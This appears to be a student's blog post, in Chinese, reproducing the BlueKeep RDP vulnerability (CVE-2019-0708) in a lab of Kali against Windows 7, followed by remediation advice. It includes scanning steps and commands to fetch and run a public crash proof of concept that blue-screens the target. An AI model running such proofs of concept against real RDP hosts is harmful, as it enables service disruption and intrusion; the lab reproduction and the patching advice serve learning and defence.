20184328yh CVE-2019-0708复现

1.CVE-2019-0708简介

1.1前言

微软公司于美国当地时间2019年5月14日发布重要安全公告,其操作系统远程桌面(Remote Desktop Services),俗称的3389服务存在严重安全漏洞(编号CVE-2019-0708):攻击者在没有任何授权的情况下(不需要用户名和密码),可以远程直接攻击操作系统开放的3389服务,在受害主机上执行恶意攻击行为,包括安装后门,查看、篡改隐私数据,创建拥有完全用户权限的新账户。由于3389服务应用广泛且该漏洞利用条件低,只要服务端口开放即可,导致该漏洞影响和危害程序堪比“WannaCry”。

1.2影响系统

Windows 7、windows-Server 2008 R2、Windows Server 2008、windows-xp、windows 2003

1.3环境

攻击机:kali IP:192.168.153.129
靶机: win7 IP:192.168.153.138(开放3389端口)
工具:360_RDP漏洞扫描工具

2.漏洞复现

  • Win7开启3389端口,需要打开远程桌面连接
  • kali端扫描靶机ip确认端口开启

  • 用360_RDP漏洞扫描工具进行扫描,确定存在此漏洞(360_RDP漏洞扫描工具(提取码: 59zd 解压密码:360))

  • 使用MSF查找CVE-2019-0708漏洞

  •  利用漏洞扫描模块、查看参数、设置靶机ip、运行

3.漏洞攻击

  • kali里默认没有pip3,先安装pip3,再安装impacket库下载POC
    • apt-get install python3-pip
      pip3 install impacket
      
  • 下载POC

    • git clone https://github.com/n1xbyte/CVE-2019-0708.git
      cd CVE-2019-0708

  •  进行攻击 python3 crashpoc.py 192.168.153.138 64 

  •  POC运行成功以后目标系统出现蓝屏

  • 除此之外还可以获取靶机的shell

 4.漏洞修复

  1. 及时打对应系统的安全补丁
  2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击
  4. 关闭远程桌面、开启防火墙
  5. 更新系统

 

 

posted @ 2021-04-27 11:08  20184328  阅读(82)  评论(0编辑  收藏  举报